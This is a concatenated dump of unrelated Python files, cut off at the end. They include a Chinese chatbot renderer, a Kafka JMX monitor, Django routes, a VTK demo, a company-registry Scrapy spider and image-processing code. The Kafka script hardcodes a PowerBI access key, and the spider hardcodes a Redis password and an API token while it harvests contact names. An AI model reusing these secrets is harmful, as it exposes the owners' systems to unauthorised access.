https://stackoverflow.com/questions/38241410/tensorflow-remember-lstm-state-for-next-batch-stateful-lstm\nfor special treatment for this code\n\nRender. render api_call_request_price to 什么价格...\n\"\"\"\nimport os\nimport sys\nimport logging\nimport traceback\nimport time\n\nimport numpy as np\n\nparentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ngrandfatherdir = os.path.dirname(os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(parentdir)\nsys.path.append(grandfatherdir)\n\nimport utils.solr_util as solr_util\nfrom qa.qa import Qa as QA\ncurrent_date = time.strftime(\"%Y.%m.%d\")\nlogging.basicConfig(handlers=[logging.FileHandler(os.path.join(grandfatherdir,\n 'logs/log_corpus_' + current_date + '.log'), 'w', 'utf-8')],\n format='%(asctime)s %(message)s', datefmt='%Y.%m.%dT%H:%M:%S', level=logging.INFO)\n\nclass Render:\n\n prefix = ['这样啊..', 'OK..', '好吧']\n\n def __init__(self, config):\n self.index_cls_name_mapper = dict()\n self._load_major_render(config['renderer_file'])\n # self.belief_tracker = belief_tracker\n self.interactive = QA('interactive')\n self.faq = QA('faq')\n print('attaching rendering file...')\n\n def _load_major_render(self, file):\n self.major_render_mapper = dict()\n with open(file, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip('\\n')\n key, replies = line.split('|')\n key = key.split('##')[0]\n replies = replies.split('/')\n filtered = []\n for r in replies:\n if r:\n filtered.append(r)\n self.major_render_mapper[key] = filtered\n\n def render_mapper(self, mapper):\n mapper_render = []\n if 'brand' in mapper:\n mapper_render.append(mapper['brand'])\n if 'category' in mapper:\n mapper_render.append(mapper['category'])\n return ''.join(mapper_render)\n\n def random_prefix(self):\n return np.random.choice(self.prefix)\n\n def render_api(self, api):\n if api not in self.major_render_mapper:\n return api\n return np.random.choice(self.major_render_mapper[api])\n\n def render(self, q, response, avails=dict(), prefix=''):\n try:\n if response.startswith('api_call_base') or response.startswith('api_call_greet')\\\n or response.startswith('reserved_'):\n # self.sess.clear_memory()\n matched, answer, score = self.interactive.get_responses(\n query=q)\n return answer\n if response.startswith('api_call_faq') or response.startswith('api_call_query_discount'):\n matched, answer, score = self.faq.get_responses(\n query=q)\n return answer\n if response.startswith('api_call_slot_virtual_category') or response == 'api_greeting_search_normal':\n return np.random.choice(['您要买什么?我们有手机,冰箱,电视,电脑和空调.', '你可以看看我们的手机,冰箱,电视空调电脑'])\n if response.startswith('api_call_request_'):\n if response.startswith('api_call_request_ambiguity_removal_'):\n # params = response.replace(\n # 'api_call_request_ambiguity_removal_', '')\n # rendered = '你要哪一个呢,' + params\n # return rendered + \"@@\" + response\n return self.render_api(response)\n # params = response.replace('api_call_request_', '')\n # params = self.belief_tracker.belief_graph.slots_trans[params]\n # rendered = '什么' + params\n # return rendered + \"@@\" + response\n if prefix:\n return prefix + self.render_api(response)\n return self.render_api(response)\n if response.startswith('api_call_rhetorical_'):\n entity = response.replace('api_call_rhetorical_', '')\n if entity in avails and len(avails[entity]) > 0:\n return '我们有' + \",\".join(avails[entity])\n else:\n return np.random.choice(['您好,我们这里卖各种空调电视电脑冰箱等,价格不等,您可以来看看呢',\n '您好啊,这里有各种冰箱空调电视等,价格在3000-18000,您可以来看看呢'])\n if response.startswith('api_call_search_'):\n tokens = response.replace('api_call_search_', '').split(',')\n\n and_mapper = dict()\n or_mapper = dict()\n for t in tokens:\n key, value = t.split(':')\n if key == 'price':\n or_mapper[key] = value\n else:\n and_mapper[key] = value\n docs = solr_util.query(and_mapper, or_mapper)\n if len(docs) > 0:\n doc = docs[0]\n if 'discount' in doc and doc['discount']:\n return '为您推荐' + doc['title'][0] + ',目前' + doc['discount'][0]\n else:\n return '为您推荐' + doc['title'][0]\n else:\n # use loose search, brand and category is mandatory\n and_mapper.clear()\n or_mapper.clear()\n for t in tokens:\n key, value = t.split(':')\n if key in ['category', 'brand']:\n and_mapper[key] = value\n else:\n or_mapper[key] = value\n docs = solr_util.query(and_mapper, or_mapper)\n if len(docs) > 0:\n doc = docs[0]\n if 'discount' in doc and doc['discount']:\n return '没有找到完全符合您要求的商品,为您推荐' + doc['title'][0] + ',目前' + doc['discount'][0]\n else:\n return '没有找到完全符合您要求的商品,为您推荐' + doc['title'][0]\n return response\n\n if response.startswith('api_call_query_price_'):\n params = response.replace('api_call_query_price_' ,'')\n if not params:\n return '价位在3000-18000'\n else:\n mapper = dict()\n for kv in params.split(','):\n key, value = kv.split(':')\n mapper[key] = value\n\n facet = solr_util.solr_facet(mappers=mapper, facet_field='price', is_range=True)\n response = self.render_mapper(mapper) + '目前价位在' + ','.join(facet[0])\n return response\n\n if response.startswith('api_call_query_brand_'):\n params = response.replace('api_call_query_brand_' ,'')\n if not params:\n raise ValueError('api_call_query must have params provided...')\n else:\n mapper = dict()\n for kv in params.split(','):\n key, value = kv.split(':')\n mapper[key] = value\n\n facet = solr_util.solr_facet(mappers=mapper, facet_field='brand', is_range=False)\n response = self.render_mapper(mapper) + '有' + ','.join(facet[0])\n return response\n\n if response.startswith('api_call_query_location_'):\n params = response.replace('api_call_query_location_', '')\n if not params:\n return '无法查阅'\n else:\n mapper = dict()\n for kv in params.split(','):\n key, value = kv.split(':')\n mapper[key] = value\n facet = solr_util.solr_facet(mappers=mapper, facet_field='location', is_range=False)\n response = '您要找的' + self.render_mapper(mapper) + '在' + ','.join(facet[0])\n return response\n\n return response\n except:\n print(traceback.format_exc())\n matched, answer, score = self.interactive.get_responses(\n query=q)\n logging.error(\"C@code:{}##error_details:{}\".format('render', traceback.format_exc()))\n return answer\n","sub_path":"src/kernel/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180727689","text":"from jmxquery import JMXConnection, JMXQuery\nimport requests, json\nfrom datetime import datetime, timezone\n\nDWH7 = '42.119.252.86'\nKAFKA01 = '183.80.199.4'\nKAFKA02 = '183.80.199.5'\nKAFKA03 = '118.69.190.39'\n#JMX_PORT = 9999\nJMX_PORT = 9996\n# KAFKA_HOST = DWH7\nJVM_HOSTS = [KAFKA01, KAFKA02, KAFKA03]\n\nMSG_IN_PER_TOPIC_PER_BROKER_URL = \"https://api.powerbi.com/beta/658d257f-4608-4ae9-85f3-61f7e4628c97/datasets/d8662276-5a29-476b-b671-7eee054cba2e/rows?key=u%2BKEPzyfUc%2FFOrcFh735wN%2BzNGYKNB365v53ouZSiksBPer26%2BrsVV7%2FE6%2FIXiza8j9DPqJlwaz3mKPW5iUhOA%3D%3D\"\n\n# function to send real_time data to PowerBI-------------\ndef getpayload_msginperbrokerpertopic(metrics_dict, timestamp):\n payload = []\n for socket, metrics in metrics_dict.items():\n for metric in metrics:\n if metric.attribute in ['Count', 'OneMinuteRate']:\n record = {}\n record['timestamp'] = timestamp\n record['host'] = socket\n record['topic'] = metric.metric_labels['topic']\n record['attribute'] = metric.attribute\n record['value'] = metric.value\n payload.append(record) \n return payload\n\ndef jmx_query(jvmHosts, jmxPort, jmxQuery):\n metrics_dict = {}\n timestamp = datetime.now().isoformat(timespec='seconds')\n for host in jvmHosts:\n jmxConnection = JMXConnection(f\"service:jmx:rmi:///jndi/rmi://{host}:{jmxPort}/jmxrmi\")\n jmxQuery = jmxQuery\n metrics = jmxConnection.query(jmxQuery)\n metrics_dict[host] = metrics\n return metrics_dict, timestamp \n\ndef print_metrics_dict(metrics_dict):\n for key, value in metrics_dict.items():\n print(key)\n for metric in value:\n print(f'\\t{metric.metric_name}, {metric.metric_labels}, {metric.value}')\n#JMX--------------\ntestQuery = [\n JMXQuery(mBeanName=\"kafka.server:type=BrokerTopicMetrics,name=MessagesInPerSec,topic=*\", \n metric_name=\"{name}---{topic}---{attribute}\")]\n\nmsgInPerTopicPerBrokerQuery = [\n JMXQuery(mBeanName=\"kafka.server:type=BrokerTopicMetrics,name=MessagesInPerSec,topic=*\", \n metric_name=\"{name}\",\n metric_labels={'topic':'{topic}'})]\n\n#metrics_dict, timestamp = jmx_query(JVM_HOSTS, JMX_PORT, testQuery)\n#print_metrics_dict(metrics_dict)\n\nmetrics_dict, timestamp = jmx_query(JVM_HOSTS, JMX_PORT, msgInPerTopicPerBrokerQuery)\np = getpayload_msginperbrokerpertopic(metrics_dict, timestamp)\nfor record in p:\n print(record)\n\n\n\n\n\n\n\n\n","sub_path":"test-print-msginpertopicperbroker.py","file_name":"test-print-msginpertopicperbroker.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442534514","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n # 로그인, 아이디비번찾기, 회원가입\n path('login/', views.login, name='login_customer'),\n # path('idpw_search/', views.idpw_search, name='idpw_search_customer'),\n path('signUp/', views.signUp, name='signUp_customer'),\n\n path('main/', views.main, name='main_customer'),\n\n # 주문하기\n # 화면에서 위치, 수령일 바꾸고 싶으면 url 바뀌어야..(?)\n # 메인화면(위치, 수령일 선택 화면)\n # path('order/', views.searchStoreList, name='searchStorelist_customer'),\n # # 가게목록 보여주는 화면.\n # # (수령일, 위치(다시 선택 가능?), 분류기준<맛별점, 서비스별점, 디자인별점, 종합별점>, 매장명검색, 매장목록<매장명, 매장위치, 전화번호, 종합별점>)\n # path('order/matchedStoreList', views.storeList, name='matchedStoreList_customer'),\n # # 가게 선택 후, 그 가게의 케이크 목록 보여주는 화면.\n # # (매장명, 주문가능한 날짜 (달력), 매장소개글, 수령일(다시 선택 가능?), 픽업시간, 케이크목록<케이크 사진, 케이크 이름, 케이크 최소금액, 미니사이즈가능여부>)\n # path('order/selectedStoreCakeList', views.cakeList, name='selectedStoreCakeList_customer'),\n # # 가게의 케이크 목록 보여주는 화면에서 가게명을 선택했을 때 보이는 가게의 정보\n # # (영업시간, 전화번호,,이 정도면 되나?)\n # path('order/selectedStoreCakeList/storeInfo', views.storeInfo, name='storeInfo_customer'),\n # # 나만의 케이크\n # # (선택한 케이크 사진, 옵션 선택<필수옵션, 선택옵션<선택지, 가격>>, 사장님이 전하는 말, 색조합)\n # path('order/selectedCake', views.selectedCake, name='selectedCake_customer'),\n # # 색조합 선택할 때마다 다른 url인가? 색조합선택화면은 다를 듯\n # path('order/selectedCake/backgroundColor', views.backgroundColor, name='backgroundColor_customer'),\n # path('order/selectedCake/textColor', views.textColor, name='textColor_customer'),\n # path('order/selectedCake/creamColor', views.creamColor, name='creamColor_customer'),\n\n # 주문내역조회\n # (수령날짜, 수령시간, 선택한 케이크 이미지, 최종가격, 주문매장, 주문진행상황, 주문번호(?))\n path('orderList/', views.orderlist, name='orderList_customer'),\n # 주문내역조회-수정하기는 selectedCake과 다른 페이지라고 해야하나 아니면 그 화면에 그대로 + 정보 자동기입?\n # path('orderList/changeOrder', views.changeOrder, name='changeOrder_customer'),\n\n # 마이페이지\n # (이메일(변경가능?), 비밀번호, 이름, 핸드폰번호,,)\n path('mypage/', views.mypage, name='mypage_customer')\n]\n","sub_path":"customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"185762869","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\ndef solve():\n m = [input() for _ in range(4)]\n input()\n def check(line,el):\n for x in line:\n if x!='T' and x!=el:\n return False\n return True\n lines = m + list(zip(*m)) + [m[0][0]+m[1][1]+m[2][2]+m[3][3],m[0][3]+m[1][2]+m[2][1]+m[3][0]]\n for line in lines:\n if check(line,'X'):\n print ('X won')\n return\n if check(line,'O'):\n print ('O won')\n return\n if '.' in ''.join(m):\n print (\"Game has not completed\")\n else:\n print (\"Draw\")\n\nif __name__==\"__main__\":\n T = int(input())\n for t in range(1,T+1):\n print(\"Case #%d:\"%t,end=' ')\n solve()\n","sub_path":"solutions_2453486_0/Python/alberist2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129940269","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n \nimport sys\nimport os.path\n\nfrom PyQt4 import QtCore, QtGui\nQtCore.Signal = QtCore.pyqtSignal\n\nimport vtk\nfrom vtk.qt4.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor\n\nclass VTKFrame(QtGui.QFrame):\n def __init__(self, parent = None):\n super(VTKFrame, self).__init__(parent)\n\n self.vtkWidget = QVTKRenderWindowInteractor(self)\n vl = QtGui.QVBoxLayout(self)\n vl.addWidget(self.vtkWidget)\n vl.setContentsMargins(0, 0, 0, 0)\n \n self.ren = vtk.vtkRenderer()\n self.ren.SetBackground(0.3, 0.4, 0.5)\n self.vtkWidget.GetRenderWindow().AddRenderer(self.ren)\n self.iren = self.vtkWidget.GetRenderWindow().GetInteractor()\n \n # Create lines.\n points = vtk.vtkPoints()\n points.InsertPoint(0, 0, 0, 1)\n points.InsertPoint(1, 1, 0, 0)\n points.InsertPoint(2, 0, 1, 0)\n points.InsertPoint(3, 1, 1, 1)\n\n line1 = vtk.vtkLine()\n line1.GetPointIds().SetId(0, 0)\n line1.GetPointIds().SetId(1, 1)\n\n line2 = vtk.vtkLine()\n line2.GetPointIds().SetId(0, 2)\n line2.GetPointIds().SetId(1, 3)\n\n lines = vtk.vtkCellArray()\n lines.InsertNextCell(line1)\n lines.InsertNextCell(line2)\n\n polyData = vtk.vtkPolyData()\n polyData.SetPoints(points)\n polyData.SetLines(lines)\n\n ruledSurfaceFilter = vtk.vtkRuledSurfaceFilter()\n ruledSurfaceFilter.SetInputConnection(polyData.GetProducerPort())\n\n ruledSurfaceFilter.SetResolution(21, 21)\n ruledSurfaceFilter.SetRuledModeToResample()\n \n # Create a mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(ruledSurfaceFilter.GetOutputPort())\n \n # Create an actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(0.89, 0.81, 0.34)\n \n self.ren.AddActor(actor)\n self.ren.ResetCamera()\n\n self._initialized = False\n\n def showEvent(self, evt):\n if not self._initialized:\n self.iren.Initialize()\n self.startTimer(30)\n self._initialized = True\n\n def timerEvent(self, evt):\n self.ren.GetActiveCamera().Azimuth(1)\n self.vtkWidget.GetRenderWindow().Render()\n \nclass MainPage(QtGui.QMainWindow):\n def __init__(self, parent = None):\n super(MainPage, self).__init__(parent)\n self.setCentralWidget(VTKFrame())\n\n self.setWindowTitle(\"Ruled Surface Filter example\")\n\n def categories(self):\n return ['Filters']\n\n def mainClasses(self):\n return ['vtkRuledSurfaceFilter', 'vtkLine', 'vtkPoints', 'vtkCellArray']\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n w = MainPage()\n w.show()\n sys.exit(app.exec_())\n","sub_path":"ruledsurfacefilter.py","file_name":"ruledsurfacefilter.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389964494","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport redis\nfrom scrapy import Selector\nfrom scrapy.http import Request\nimport time\nimport random\nimport json\n\n\n\nclass ShanxiJianzhuImformationSpider(scrapy.Spider):\n name = 'reverse_zhejiang'\n\n def start_requests(self):\n pool = redis.ConnectionPool(host='106.12.112.205', password='tongna888')\n self.r = redis.Redis(connection_pool=pool)\n self.url = 'http://115.29.2.37:8080/enterprise_ajax.php'\n self.index = 1\n self.flag = True\n self.x = True\n self.token = 'LnHRF8R1jmqOLFnnK048DcokeilQRDS2'\n self.company_url = 'http://115.29.2.37:8080/'\n yield scrapy.Request(url=self.url, callback=self.parse)\n\n def parse(self, response):\n psot_forma_data = {}\n if self.x:\n topage = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[4]/@alt').extract_first()\n name = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[4]/text()').extract_first()\n self.x = False\n else:\n topage = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[2]/@alt').extract_first()\n name = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[2]/text()').extract_first()\n print(topage, name)\n psot_forma_data['page'] = topage\n tr = Selector(response=response).xpath('//table[@class=\"t1\"]/tr')\n print(len(tr))\n del tr[0]\n print(len(tr))\n for t in tr:\n td = t.xpath('./td')\n url = td[1].xpath('./div/a/@href').extract_first()\n url = self.company_url + url\n print(url, 'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzz')\n yield Request(url=url, callback=self.company_information,\n dont_filter=True,\n )\n # page = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[3]/@alt').extract_first()\n self.index = self.index + 1\n if not self.index == 5:\n yield scrapy.FormRequest(url=self.url,\n formdata={'page': topage},\n callback=self.parse,\n dont_filter=True)\n\n def company_information(self, response):\n # print(response.text)\n company_name = Selector(response=response).xpath('//td[@colspan=\"5\"]')[0].xpath('text()').extract_first()\n # company_name = Selector(response=response).xpath('//td[@colspan=\"5\"]')\n print(company_name)\n address = Selector(response=response).xpath('//td[@colspan=\"5\"]/text()')[1].extract()\n number = Selector(response=response).xpath('//div[@class=\"detail_list\"]/table/tr[2]/td[6]/text()').extract_first()\n person_name = Selector(response=response).xpath('//div[@class=\"detail_list\"]/table/tr[7]/td[2]/text()').extract_first()\n print(company_name, address, number, person_name, 'AAAAAAAAAAAAAAAAAAAAAA')\n print(company_name, number, person_name, 'AAAAAAAAAAAAAAAAAAAAAA')\n data = {}\n print()\n data['companyName'] = company_name\n number = number.split()\n if number != []:\n number = number[0]\n if len(number) == 18:\n data['licenseNum'] = number\n else:\n data['licenseNum'] = ''\n else:\n data['licenseNum'] = ''\n person_name = person_name.split()\n print(person_name, type(person_name), 'AAAAAAAAAAAAAAAAAAAA')\n if person_name != []:\n person_name = person_name[0]\n print(person_name)\n data['contactMan'] = person_name\n else:\n data['contactMan'] = ''\n if address != None:\n adderss = address.split()[0]\n data['contactAddress'] = adderss\n else:\n data['contactAddress'] = ''\n data['companyArea'] = '浙江省'\n data['area'] = ''\n data['contactPhone'] = ''\n data['token'] = self.token\n print(data)\n yield scrapy.Request(\n url='https://api.maotouin.com/rest/companyInfo/addCompanyRecord.htm',\n # url='http://192.168.199.188:8080/web/rest/companyInfo/addCompanyRecord.htm',\n method=\"POST\",\n headers={'Content-Type': 'application/json'},\n body=json.dumps(data),\n callback=self.zz,\n meta={'company_name': company_name, 'data': data},\n dont_filter=True\n )\n\n def zz(self, response):\n not_company_code = json.loads(response.text)['code']\n not_search_company_name = response.meta['company_name']\n zz_data = response.meta['data']\n self.r.sadd('all_company_name', not_search_company_name)\n print(response.text)\n data = json.dumps(zz_data, ensure_ascii=False)\n print(response.meta['data'], 'aaaaaaaaaaaaaaaaaa')\n if not_company_code == -102:\n self.r.sadd('title_name1', not_search_company_name)\n self.r.sadd('title_102', data)\n self.r.sadd('title_name3', not_search_company_name)\n print(not_search_company_name, '没找到的企业')\n else:\n print(not_search_company_name, '找到的企业')\n\n\n","sub_path":"shanxi_jianzhu/shanxi_jianzhu/spiders/reverse_zhejiang.py","file_name":"reverse_zhejiang.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226120058","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\nfrom whatnet.data.converter import ConverterBase\nimport whatnet.data.datasets.mnist as data_read\n\n\nclass CnnConverter(ConverterBase):\n def __init__(self, param_file_path='../config/converter_config_default.json'):\n\n with open(param_file_path, 'r') as f:\n self.params = json.load(f)\n\n super().__init__(28 * 28)\n self.con_win_w = self.params['convolution_win_width']\n self.con_win_h = self.params['convolution_win_height']\n self.mp_win_w = self.params['max_pooling_win_width']\n self.mp_win_h = self.params['max_pooling_win_height']\n\n self.operation = self.params['operation']\n\n # whether use custom kernel\n self.__is_c_kernel = self.params['c_kernel']\n\n # convolution kernel\n self.kernel1 = []\n self.kernel2 = []\n self.kernel3 = []\n self.kernel4 = []\n\n # custom convolution kernel\n self.kernels = {}\n\n # initialize kernels\n self.__init_kernel(self.con_win_w, self.con_win_h)\n self.kernels = self.params['kernels']\n if self.__is_c_kernel:\n self.kernels_num = len(self.kernels.keys())\n else:\n self.kernels_num = 4\n\n # training config\n self.bias = 50.\n self.inh_t = 35.\n self.teacher = 75.\n\n # converterFuc\n self.converterFunc = self.params['converter_func']\n\n # image width height\n self.img_width = self.params['image_w']\n self.img_height = self.params['image_h']\n\n # pro_width pro_height\n self.pro_width = self.params['image_w']\n self.pro_height = self.params['image_h']\n self.__init_pro_w_h()\n\n def __init_kernel(self, con_w, con_h):\n for i in range(con_h):\n if i == int(con_h / 2):\n self.kernel1.append([1] * con_w)\n else:\n self.kernel1.append([0] * con_w)\n\n for i in range(con_h):\n r = [0] * con_w\n r[int(con_w / 2)] = 1\n self.kernel2.append(r)\n\n for i in range(con_h):\n r = [0] * con_w\n r[i] = 1\n self.kernel3.append(r)\n\n for i in range(con_h):\n r = [0] * con_w\n r[con_w - i - 1] = 1\n self.kernel4.append(r)\n\n def __init_pro_w_h(self):\n self.pro_width = self.img_width\n self.pro_height = self.img_height\n for op in self.operation:\n if op == 'convolution':\n self.pro_width = self.pro_width - self.con_win_w + 1\n self.pro_height = self.pro_height - self.con_win_h + 1\n elif op == 'pooling':\n self.pro_width = int(self.pro_width / self.mp_win_w)\n self.pro_height = int(self.pro_height / self.mp_win_h)\n else:\n raise \"No such operation in cnn_converter. You may try {\" + \"convolution or pooling\" + \"}.\"\n\n def change_kernal(self, kernels):\n mgs = np.shape(kernels)\n self.kernel1 = np.array(kernels[0]).tolist()\n self.kernel2 = np.array(kernels[1]).tolist()\n self.kernel3 = np.array(kernels[2]).tolist()\n self.kernel4 = np.array(kernels[3]).tolist()\n\n self.con_win_w = mgs[1]\n self.con_win_h = mgs[2]\n self.__init_pro_w_h()\n\n def get_kernels(self):\n kernels = [] + self.kernel1 + self.kernel2 + self.kernel3 + self.kernel4\n return np.array(kernels).flatten().reshape(4, 8, 8)\n\n def ac_kernel(self, kernel):\n self.kernels['ga_kernel'] = np.array(kernel).tolist()\n self.kernels_num = 5\n\n # data converter\n # ------------------------------------------------------------------------------\n def data(self, data, step=8):\n spike_times = []\n if not self.__is_c_kernel:\n intermediate_result = self.pre_pro(data)\n else:\n intermediate_result = self.pre_pro_c(data)\n\n max_p = self.get_max_value(intermediate_result)\n\n for image_kernel in intermediate_result.values():\n image_coved = self.function_conver(self.converterFunc, image_kernel, max_p, 0) + self.bias\n c = self.add_spike(image_coved)\n spike_times = spike_times + c\n\n return spike_times\n\n def target(self, target, inh=list()):\n spike_times = [np.array([], dtype=np.float)] * 10\n if len(inh) != 0:\n for _ in set(inh):\n spike_times[_] = np.array([self.inh_t], dtype=np.float)\n spike_times[target] = np.array([self.teacher], dtype=np.float)\n return spike_times\n\n # value mapping\n @staticmethod\n def mapping(xo, vo_max, vo_min, vn_max, vn_min):\n return (vn_max - vn_min) / (vo_max - vo_min) * (xo - vo_min) + vn_min\n\n @staticmethod\n def get_max_value(intermediate_result):\n max_p = 0\n for img in intermediate_result.values():\n max_p = max(max_p, max(img.flatten()))\n return max_p\n\n @staticmethod\n def __display_distribution(x, y):\n plt.scatter(x, y, color=\"red\")\n plt.show()\n\n def function_conver(self, converfunc, data, max_value, min_value):\n if converfunc == \"exponent\":\n image_mapped = self.mapping(data.flatten(), max_value, min_value, 0, -np.log2(100))\n return 0.5 ** np.array(image_mapped, dtype=np.float)\n elif converfunc == \"power\":\n image_mapped = self.mapping(data.flatten(), max_value, min_value, 0, -np.sqrt(99))\n return np.array(image_mapped, dtype=np.float) ** 2 + 1\n elif converfunc == \"linear\":\n image_mapped = self.mapping(data.flatten(), max_value, min_value, 99, 0)\n return 100 - np.array(image_mapped, dtype=np.float)\n elif converfunc == \"inverse\":\n image_mapped = self.mapping(data.flatten(), max_value, min_value, 100, 1)\n return 100 / np.array(image_mapped, dtype=np.float)\n else:\n raise Exception(\"No this Function!\")\n\n def add_spike(self, image_coved):\n spikes = []\n for v in image_coved:\n ss = round(v, 1)\n if ss != 100. + self.bias:\n spikes.append([ss])\n else:\n spikes.append([])\n return spikes\n\n # Convolution and Max Pooling\n # --------------------------------------\n\n @staticmethod\n def convolution(patch, kernal):\n return sum((patch * np.array(kernal, dtype=np.float)).flatten())\n\n def convolution_layer(self, data, kernal):\n image_shape = np.shape(data)\n image_data = np.array(data, dtype=np.float).flatten().reshape(image_shape[0], image_shape[1])\n self.pro_width = image_shape[0] - self.con_win_w + 1\n self.pro_height = image_shape[1] - self.con_win_h + 1\n con_image_data = [self.convolution(np.array(image_data[r:r + self.con_win_w, c:c + self.con_win_h], dtype=np.float), kernal=kernal)\n for r in range(image_shape[0] - self.con_win_w + 1)\n for c in range(image_shape[1] - self.con_win_h + 1)]\n return np.array(con_image_data, dtype=np.float).reshape(self.pro_width, self.pro_height)\n\n @staticmethod\n def max_pooling(patch):\n ret_value = max(patch.flatten())\n if ret_value <= 100:\n return 0\n else:\n return max(patch.flatten())\n\n def max_pooling_layer(self, data):\n image_shape = np.shape(data)\n image_data = np.array(data, dtype=np.float).flatten().reshape(image_shape[0], image_shape[1])\n self.pro_width = int(image_shape[0] / self.mp_win_w)\n self.pro_height = int(image_shape[1] / self.mp_win_h)\n mp_image_data = [self.max_pooling(np.array(image_data[r:r + self.mp_win_w, c:c + self.mp_win_h], dtype=np.float))\n for r in range(0, (self.pro_width - 1) * self.mp_win_w + 1, self.mp_win_w)\n for c in range(0, (self.pro_height - 1) * self.mp_win_h + 1, self.mp_win_h)]\n return np.array(mp_image_data, dtype=np.float).reshape(self.pro_width, self.pro_height)\n\n def pre_pro(self, data):\n intermediate_result = {'k1': data, 'k2': data, 'k3': data, 'k4': data}\n for op in self.operation:\n if op == 'convolution':\n intermediate_result['k1'] = self.convolution_layer(intermediate_result['k1'], kernal=self.kernel1)\n intermediate_result['k2'] = self.convolution_layer(intermediate_result['k2'], kernal=self.kernel2)\n intermediate_result['k3'] = self.convolution_layer(intermediate_result['k3'], kernal=self.kernel3)\n intermediate_result['k4'] = self.convolution_layer(intermediate_result['k4'], kernal=self.kernel4)\n elif op == 'pooling':\n intermediate_result['k1'] = self.max_pooling_layer(intermediate_result['k1'])\n intermediate_result['k2'] = self.max_pooling_layer(intermediate_result['k2'])\n intermediate_result['k3'] = self.max_pooling_layer(intermediate_result['k3'])\n intermediate_result['k4'] = self.max_pooling_layer(intermediate_result['k4'])\n return intermediate_result\n\n def pre_pro_c(self, data):\n intermediate_result = {}\n\n for key in self.kernels.keys():\n intermediate_result[key] = data\n\n for op in self.operation:\n if op == 'convolution':\n for key in self.kernels.keys():\n intermediate_result[key] = self.convolution_layer(intermediate_result[key], kernal=self.kernels[key])\n elif op == 'pooling':\n for key in self.kernels.keys():\n intermediate_result[key] = self.max_pooling_layer(intermediate_result[key])\n\n return intermediate_result\n\n @staticmethod\n def draw_data(ori_image, new_image=221):\n plt.subplot(new_image)\n plt.imshow(ori_image)\n\n\n# Unit Test\nif __name__ == \"__main__\":\n mnist = data_read.read_data_sets(\"../../scripts/data\")\n converter = CnnConverter(param_file_path='../../config/converter_config_default.json')\n\n image = mnist.train.data[1]\n print(\"Target %s\" % mnist.train.target[1])\n print(converter.pro_width, converter.pro_height)\n\n pre = converter.pre_pro_c(image)\n num = 1\n for value in pre.values():\n converter.draw_data(value, 220 + num)\n num += 1\n if num > 4:\n num = 1\n plt.figure()\n\n plt.show()\n","sub_path":"whatnet/data/cnn_converter.py","file_name":"cnn_converter.py","file_ext":"py","file_size_in_byte":10455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621051122","text":"import numpy as np\r\nimport cv2\r\n\r\nimg1 = cv2.imread('img1.jpg', cv2.IMREAD_COLOR)\r\nimg2 = cv2.imread('logo2.jpg', cv2.IMREAD_COLOR)\r\n\r\nrows, cols, channels = img2.shape\r\nprint(\"rows, cols, channels are \", rows, cols, channels)\r\nroi = img1[0:rows, 0:cols]\r\ncv2.imshow('roi', roi)\r\n\r\nimg2gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\r\nret, mask1 = cv2.threshold(img2gray, 220, 255, cv2.THRESH_BINARY_INV)\r\nmask_inv = cv2.bitwise_not(mask1)\r\n\r\nimg1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\r\nimg2_fg = cv2.bitwise_and(img2, img2, mask=mask1)\r\ndst = cv2.add(img1_bg, img2_fg)\r\nimg1[0:rows, 0:cols] = dst\r\n\r\ncv2.imshow('img2gray', img2gray)\r\ncv2.imshow('mask1', mask1)\r\ncv2.imshow('mask_inv', mask_inv)\r\ncv2.imshow('img1_bg', img1_bg)\r\ncv2.imshow('img2_fg', img2_fg)\r\ncv2.imshow('dst', dst)\r\ncv2.imshow('img1', img1)\r\n\r\n\r\n# add = img1 + img2\r\n# print(add)\r\n# print(\"-----------------------------\")\r\n# addn = cv2.add(img1, img2)\r\n# addn = cv2.subtract(img1, img2)\r\n\r\n# weighted = cv2.addWeighted(img1, 0.6, img2, 0.4, 0) \r\n\r\n# cv2.imshow('Added image', add)\r\n# cv2.imshow('Added image', weighted)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"src/cv/cv_arth.py","file_name":"cv_arth.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346148974","text":"import numpy as np\nimport GradientDescent_2B as 